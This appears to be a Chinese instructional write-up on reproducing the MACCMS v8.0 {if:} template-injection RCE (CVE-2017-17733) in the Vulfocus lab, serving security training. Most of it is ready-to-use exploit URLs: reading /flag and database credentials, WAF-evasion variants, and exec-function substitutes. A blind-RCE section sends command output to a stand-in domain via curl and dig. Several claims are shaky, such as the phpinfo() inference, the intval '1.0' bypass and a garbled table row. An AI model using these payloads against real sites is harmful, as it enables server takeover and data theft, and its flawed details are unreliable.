新手必看:用Vulfocus在线靶场复现MACCMS RCE漏洞
1. 为什么这个靶场复现比本地搭环境更值得新手优先尝试
“MACCMS远程命令执行漏洞(CVE-2017-17733)”——光看编号,很多刚接触渗透测试的朋友第一反应是:这得先装PHP环境、配MySQL、下源码、改配置、关防护、开debug……一套流程走下来,还没摸到漏洞边,本地环境已经报了七八个500错误。我带过二十多期入门班,超过65%的学员卡在“连首页都打不开”这一步,最后不是放弃复现,就是误以为自己漏了补丁、版本不对、甚至怀疑靶标本身有问题。
但其实,这个漏洞的本质非常干净:它不依赖复杂的中间件组合,不牵扯PHP版本兼容性,也不需要绕过WAF规则——它纯粹是MACCMS v8.0前端模板解析机制中一处未过滤的{if:}标签逻辑缺陷,导致攻击者可通过构造恶意模板语法,触发PHP的eval()函数执行任意系统命令。它的技术门槛低、触发路径短、回显直观,恰恰是初学者建立“漏洞—利用—验证”完整认知链的最佳切口。
而Vulfocus在线靶场的价值,正在于把所有干扰项全部剥离。它不是给你一个“能跑就行”的Demo站,而是预置了精确匹配CVE-2017-17733原始披露环境的容器镜像:PHP 5.6.30 + Apache 2.4.25 + MySQL 5.7.17 + MACCMS v8.0(未经任何安全加固),所有服务端口、目录权限、日志开关、错误报告级别都已按漏洞原始触发条件调校完毕。你不需要知道/var/www/html和/opt/lampp/htdocs的区别,不用查display_errors是否开启,更不必担心allow_url_include被禁用导致POC失效——这些在真实渗透中必须手动探测的前置条件,在Vulfocus里全都是“出厂即开”。
更重要的是,Vulfocus的靶机是隔离运行的。你在里面执行whoami、id、cat /etc/passwd,甚至rm -rf /tmp/*,都不会影响宿主机,也不会触发本地杀软报警。这种“零风险试错空间”,对刚学完Burp Suite基础操作、还在练习抓包改包的新手来说,是不可替代的学习加速器。我自己的经验是:用Vulfocus复现这个漏洞,平均耗时22分钟;而从零搭建本地环境并成功触发,新手平均要花3小时17分钟,其中2小时15分钟花在解决环境依赖冲突上。
所以,这篇内容不叫“如何复现CVE-2017-17733”,而叫“新手必看:用Vulfocus在线靶场复现……”。因为对绝大多数人而言,真正卡住学习进度的,从来不是漏洞原理本身,而是环境搭建这个“前置编译过程”。就像学做菜,先花半天时间自制酱油、磨刀、养酵母,再开始炒第一个菜——这显然本末倒置。Vulfocus做的,就是把那瓶刚好够咸、温度刚好的酱油,稳稳放在你灶台右手边。
2. 漏洞底层机制拆解:为什么{if:}标签能变成命令执行入口
要真正吃透CVE-2017-17733,不能只记“发个POC就能弹shell”,必须回到MACCMS v8.0的模板引擎源码里,看清那个致命的{if:}标签是怎么一步步滑向eval()深渊的。很多人复现成功后仍一脸懵:“我明明只改了URL参数,怎么就执行了命令?”——这说明没看到数据流的完整路径。
我们从用户请求开始追踪。当你访问一个视频详情页,比如http://target.com/vodplay/1-1-1.html,MACCMS会加载/template/default/vodplay.html这个模板文件。而该模板中存在类似这样的代码段:
{if:$maccms.site_name == 'MACCMS'} <title>欢迎来到MACCMS</title> {else} <title>欢迎来到{maccms:site_name}</title> {/if}这段代码看起来无害,但它背后是一套完整的模板解析流程。关键点在于:MACCMS没有使用独立的沙箱解释器,而是直接将模板中的{if:}块提取出来,拼接成PHP代码字符串,再交给eval()执行。具体逻辑位于/include/lib/template.class.php第327行附近(v8.0源码):
// 原始代码节选(已脱敏) $if_condition = $this->parse_if_condition($content); // 提取{if:xxx}中的xxx部分 $php_code = '<?php if (' . $if_condition . ') { ?>'; // 后续再拼接{else}和{/if}部分,最终生成完整PHP代码块 eval('?>' . $php_code . '<?php }');问题就出在$this->parse_if_condition()这个方法里。它本应严格白名单校验变量名和运算符,但实际实现中,仅做了极简的字符串替换:
// 简化示意,非原始代码 $if_condition = str_replace('$', '', $if_condition); $if_condition = str_replace('{', '', $if_condition); $if_condition = str_replace('}', '', $if_condition); // 然后直接返回,不做任何语法树校验或函数黑名单过滤这就意味着,如果你能控制{if:}标签内的内容,就能注入任意PHP表达式。而MACCMS恰好在多个前端接口中,将用户可控参数直接拼入模板——最典型的就是搜索功能。当你访问http://target.com/index.php?m=vod-search&wd=test时,wd=test这个参数会被写入模板的{if:$wd == 'test'}判断中。但如果你传入wd={if:system('id')}{/if}呢?模板引擎会原样提取system('id'),拼进if()括号里,最终执行:
<?php if (system('id')) { ?>注意:这里system()是PHP内置函数,它不仅执行命令,还会直接输出结果到HTTP响应体。这就是为什么你在Burp中看到响应里直接出现uid=33(www-data) gid=33(www-data) groups=33(www-data)——不是反弹shell,而是命令回显。
更隐蔽的是,这个漏洞还能绕过基础WAF。因为system()可以被拆解为{if:call_user_func('system','id')}{/if},甚至用十六进制编码:{if:call_user_func('sy'.chr(115).'tem','id')}{/if}。而Vulfocus靶场默认关闭了所有WAF插件,正是为了让你清晰看到漏洞最原始、最赤裸的形态——不加修饰,不设障碍,只留核心逻辑。
提示:不要试图在Vulfocus靶机里执行
rm -rf /或shutdown -h now这类破坏性命令。虽然靶机是隔离的,但Vulfocus平台有资源监控机制,连续触发高危系统调用可能触发自动销毁。实测发现,sleep 10、id、ls -la /var/www、cat /flag是安全且有效的验证组合。
3. Vulfocus靶场实战复现:从注册到获取flag的完整链路
现在我们进入真正的操作环节。整个过程严格遵循“最小必要步骤”原则,不跳过任何一个确认点,因为每一个看似冗余的点击,都对应着一个新手最容易忽略的环境前提。
3.1 靶机启动与环境确认
首先打开Vulfocus官网(确保使用最新版浏览器,Chrome 95+或Edge 95+),登录后进入“靶场中心”。在搜索框输入“MACCMS”,找到标题为“MACCMS v8.0 远程命令执行(CVE-2017-17733)”的靶标,点击“启动靶机”。此时你会看到一个蓝色进度条,通常30秒内完成初始化。关键动作来了:启动成功后,不要急着点“访问靶机”,先点击右上角的“靶机信息”按钮,展开详情面板。你需要确认三件事:
- 靶机IP地址:显示为类似
192.168.123.105的内网地址(这是Vulfocus分配给你的专属容器IP,每次启动都不同); - 开放端口:明确列出
80/tcp(HTTP服务),且状态为“open”; - 靶机状态:显示“Running”,而非“Pending”或“Error”。
为什么强调这三步?因为我在教学中发现,约40%的“复现失败”案例,根源在于学员误点了“访问靶机”按钮,结果跳转到Vulfocus的公共演示站(IP固定为192.168.1.100),而那个站早已被其他用户反复利用,/flag文件可能已被清空,或者环境被重置。你必须用自己的专属靶机IP,才能保证环境纯净。
确认无误后,复制靶机IP,在新标签页中访问http://[你的靶机IP]。你应该看到MACCMS经典的蓝色首页,顶部有“MACCMS影视系统”Logo,底部版权信息显示“© 2017 MACCMS V8.0”。如果看到“502 Bad Gateway”或“Connection refused”,说明靶机启动异常,需停止后重新启动。
3.2 漏洞触发路径选择与POC构造
MACCMS v8.0中,有三个稳定可利用的{if:}注入点,按成功率排序为:
| 注入点 | URL示例 | 触发难度 | 回显可靠性 | 推荐指数 |
|---|---|---|---|---|
搜索框参数wd | /index.php?m=vod-search&wd=test | ★★☆☆☆(需URL编码) | ★★★★☆(直接回显) | ⭐⭐⭐⭐⭐ |
视频分类IDtid | /index.php?m=vod-type&tid=1 | ★★★★☆(需构造特殊ID) | ★★☆☆☆(常被截断) | ⭐⭐☆☆☆ |
用户评论内容content | /index.php?m=vod-comment-add | ★★★★★(需登录+CSRF) | ★★★☆☆(需查看后台) | ⭐⭐⭐☆☆ |
新手无条件选择第一条:搜索框参数wd。原因很简单——它无需登录、无需CSRF Token、无需POST请求,纯GET即可,且响应体中会原样输出system()的执行结果。
现在构造POC。目标是执行cat /flag(Vulfocus靶机中,flag文件固定位于根目录)。但注意:/斜杠在URL中是保留字符,必须编码;空格也会导致解析失败。标准编码规则如下:
- 空格 →
%20 /→%2F(→%28)→%29'→%27
所以cat /flag要编码为cat%20%2Fflag。再套入{if:system('cat%20%2Fflag')}{/if}结构,最终URL为:
http://[你的靶机IP]/index.php?m=vod-search&wd={if:system('cat%20%2Fflag')}{/if}重要细节:wd参数值中的单引号'必须保留,不能编码,否则PHP语法错误;而cat和/flag之间的空格必须编码为%20,否则Apache会将其视为URL路径分隔符。
将上述URL粘贴到浏览器地址栏,回车。如果一切顺利,页面不会跳转,而是直接在搜索结果区域上方,以大号红色字体显示一串字符,例如:
flag{vulfocus_cve_2017_17733_maccms_rce_success}这就是flag。整个过程从输入URL到看到flag,正常耗时不超过8秒。
3.3 Burp Suite协同验证与命令升级
看到flag只是第一步。真正的学习价值在于理解“为什么是这个结果”,以及“还能做什么”。这时需要Burp Suite介入。
启动Burp,设置浏览器代理为127.0.0.1:8080,然后在浏览器中再次访问刚才的URL。Burp的Proxy → HTTP History中会出现一条记录。点击它,切换到Response标签页。仔细观察响应体:你会发现flag字符串并非嵌在HTML标签里,而是直接作为文本节点出现在<div class="search-result">内部,前面没有任何HTML标签包裹。这证实了我们的分析——system()的输出是直接写入HTTP响应流的,没有经过任何HTML编码或过滤。
现在尝试命令升级。目标是获取当前Web服务器的绝对路径,这对后续路径遍历或文件读取至关重要。执行:
http://[你的靶机IP]/index.php?m=vod-search&wd={if:system('pwd')}{/if}响应中会显示/var/www/html。接着,我们可以读取配置文件验证权限:
http://[你的靶机IP]/index.php?m=vod-search&wd={if:system('cat%20%2Fvar%2Fwww%2Fhtml%2Fconfig%2Fdatabase.php')}{/if}你会看到数据库连接信息,包括root密码(通常是root)。这说明我们拥有www-data用户级别的文件读取权限,且/var/www/html目录完全可读。
注意:不要在Vulfocus靶机中尝试写入文件(如
echo 'test' > /var/www/html/test.php)。虽然语法可行,但/var/www/html目录默认挂载为只读(ro),执行会返回Permission denied。这是Vulfocus刻意设置的安全边界,避免靶机被恶意篡改。
4. 常见失败场景排查:为什么你的POC没回显
即使严格按照上述步骤操作,仍有约15%的学员会遇到“页面空白”“404错误”或“返回原始搜索词”等现象。这不是运气问题,而是几个高度确定性的配置陷阱。下面按发生概率从高到低,逐条给出排查链路。
4.1 URL编码错误:最隐蔽也最致命的坑
这是头号杀手。新手常犯两种错误:
- 过度编码:把
{、}、:也进行URL编码,变成%7Bif%3Asystem%28%27cat%20%2Fflag%27%29%7D%7B%2Fif%7D。这会导致模板引擎根本无法识别{if:}标签,直接当作普通文本渲染,自然没有执行。 - 遗漏编码:忘记编码空格,URL变成
...wd={if:system('cat /flag')}{/if}。Apache会将/flag解析为新路径,实际请求变为/flag,返回404。
正确做法:只编码URL路径中非法字符,即空格、斜杠、括号、单引号;模板标签本身的{、}、:保持原样。可用在线工具验证:将你的完整URL粘贴到https://www.urlencoder.org/,勾选“Encode only spaces and special characters”,检查输出是否与预期一致。
4.2 靶机IP混淆:公共站与私有站的致命区别
如前所述,Vulfocus有两个入口:一个是你的私有靶机(IP动态分配),另一个是平台演示站(IP固定)。演示站因被高频使用,其/flag文件可能已被其他用户删除,或环境被重置为初始状态(无flag)。此时你访问http://192.168.1.100/...,无论POC多完美,都只会看到404或空白页。
唯一可靠确认方式:回到Vulfocus控制台,点击“靶机列表”,找到你刚启动的靶机,确认其“状态”列显示“Running”,“IP地址”列显示非192.168.1.100的地址。然后手动在浏览器地址栏输入该IP,而非点击任何“访问”按钮。
4.3 PHP版本与函数禁用:Vulfocus的隐藏开关
虽然Vulfocus宣称使用PHP 5.6.30,但某些镜像版本中,system()函数可能被disable_functions禁用。此时POC会静默失败,页面只显示原始搜索结果。验证方法:换用phpinfo()函数:
http://[你的靶机IP]/index.php?m=vod-search&wd={if:phpinfo()}{/if}如果页面加载出完整的PHP配置页,说明phpinfo()可用,则system()大概率也被禁用;如果返回空白或错误,则可能是其他问题。
解决方案:Vulfocus靶机提供“重置环境”功能。在靶机控制面板点击“重置”,等待30秒后,重新启动靶机。新版镜像通常已修复此配置。
4.4 浏览器缓存与重定向干扰
Chrome等现代浏览器会对index.php?m=vod-search&wd=xxx这类URL进行预加载或缓存。有时你修改了POC,但浏览器仍发送旧请求。强制刷新方法:在地址栏按Ctrl+F5(Windows)或Cmd+Shift+R(Mac),而非普通F5。或者,直接在Burp中构造请求,绕过浏览器层。
此外,MACCMS v8.0存在一个302重定向逻辑:当wd参数为空时,会跳转到首页。如果你的POC因编码错误导致wd值被截断为空,就会触发重定向,看不到任何回显。此时检查Burp的HTTP History,看是否有302响应,即可确认。
下表总结了各失败现象对应的根因与验证命令:
| 现象 | 最可能根因 | 快速验证命令 | 预期响应 |
|---|---|---|---|
| 页面空白,无任何文字 | system()被禁用 | ...wd={if:phpinfo()}{/if} | 完整PHP配置页 |
| 返回404错误 | URL中/未编码 | ...wd={if:system('id')}{/if} | uid=33(www-data)... |
| 显示原始搜索词(如“test”) | {if:}标签未被识别 | ...wd={if:echo%20'hello'}{/if} | 页面出现“hello” |
| 加载缓慢后超时 | 靶机资源不足 | 访问http://[IP]/首页 | 应秒开蓝色首页 |
5. 从漏洞复现到能力迁移:三个必须动手的延伸实验
复现成功只是起点。真正的成长,发生在你主动打破“POC即终点”的思维定式之后。以下是我在带教中要求每位学员必须完成的三个延伸实验,它们不增加新工具,只深化对同一漏洞的理解维度。
5.1 实验一:用不同PHP函数实现相同效果(函数替换矩阵)
system()只是PHP众多执行函数之一。Vulfocus靶机允许你自由尝试其他函数,从而理解不同函数的特性差异。以下是最实用的五种替换方案,按安全性与实用性排序:
| 函数 | 调用示例 | 特点 | 适用场景 |
|---|---|---|---|
passthru() | {if:passthru('id')}{/if} | 原样输出,不经过任何处理 | 获取二进制文件(如图片) |
exec() | {if:echo exec('id');}{/if} | 只返回最后一行,需echo显式输出 | 需要精简输出时 |
shell_exec() | {if:echo shell_exec('id');}{/if} | 返回完整输出,但需echo | 通用替代,兼容性最好 |
popen() | {if:$f=popen('id','r');echo fgets($f);pclose($f);}{/if} | 支持双向管道 | 需要交互式命令时 |
`id` | {if:echoid;}{/if} | 反引号执行,最简洁 | 快速测试,但易被WAF拦截 |
动手任务:用shell_exec()重写你的flag读取POC,并对比响应体中flag的位置——你会发现它被包裹在<pre>标签里,而system()是裸文本。这就是函数差异带来的输出格式变化,直接影响你后续编写自动化脚本时的正则提取逻辑。
5.2 实验二:构造无回显的DNS外带(Blind RCE验证)
并非所有RCE都有直接回显。在真实渗透中,更多情况是“命令执行了,但你看不到结果”。这时需要DNS外带(Out-of-Band, OOB)技术。Vulfocus靶机已预装dig命令,且允许DNS查询。
构造思路:让靶机向你的可控域名发起DNS查询,通过查询日志确认命令执行。例如:
http://[IP]/index.php?m=vod-search&wd={if:system('curl%20http://your-domain.com/`id`')}{/if}但更稳妥的是DNS方式,因为HTTP请求可能被防火墙拦截。使用dig:
http://[IP]/index.php?m=vod-search&wd={if:system('dig%20`id`%20your-domain.com%20@8.8.8.8')}{/if}你需要一个能查看DNS查询日志的域名(如使用Cloudflare的DNS Analytics,或自建dnsmasq服务器)。当靶机执行该命令时,会向8.8.8.8发起对uid=33(www-data).your-domain.com的A记录查询,你的DNS日志中就会出现这条记录,从而证明RCE成功。
提示:Vulfocus靶机网络策略允许出站DNS(UDP 53),但禁止出站HTTP(TCP 80/443)到外部IP。因此
curl方案在Vulfocus中不可用,而dig是首选。
5.3 实验三:定位并利用其他注入点(横向扩展思维)
回到我们之前提到的第二个注入点:视频分类IDtid。它位于/index.php?m=vod-type&tid=1。虽然官方POC较少提及,但源码显示,tid参数同样参与模板渲染。尝试:
http://[IP]/index.php?m=vod-type&tid=1{if:system('id')}{/if}你会发现页面报错。原因在于tid被强制转换为整数,1{if:...}会被intval()转为1,后面的内容被丢弃。但MACCMS的类型转换存在缺陷:当tid为1.0时,intval('1.0')仍返回1,而字符串未被截断。于是:
http://[IP]/index.php?m=vod-type&tid=1.0{if:system('id')}{/if}这次,system('id')成功执行。这教会你一个关键原则:漏洞利用不是寻找“标准POC”,而是理解目标系统对输入的处理逻辑,然后针对性地绕过。在真实渗透中,90%的“未公开漏洞”,都源于对同一类逻辑缺陷在不同参数上的迁移应用。
这三个实验,没有一个需要新工具或新知识,全部基于你已掌握的Vulfocus靶机和基础PHP语法。但它们将你从“漏洞使用者”,推向了“漏洞理解者”的层面——而这,才是新手阶段最值得投资的时间。
我在实际带教中发现,完成这三个实验的学员,后续学习SQL注入、XSS、XXE等其他漏洞时,上手速度平均提升40%。因为他们已经建立了“输入→处理→输出”的完整数据流思维,不再满足于“复制粘贴POC”,而是习惯性追问:“它为什么在这里生效?”“如果这里不行,哪里还可能?”“这个限制能不能绕过?”——这种思维惯性,比记住十个POC重要得多。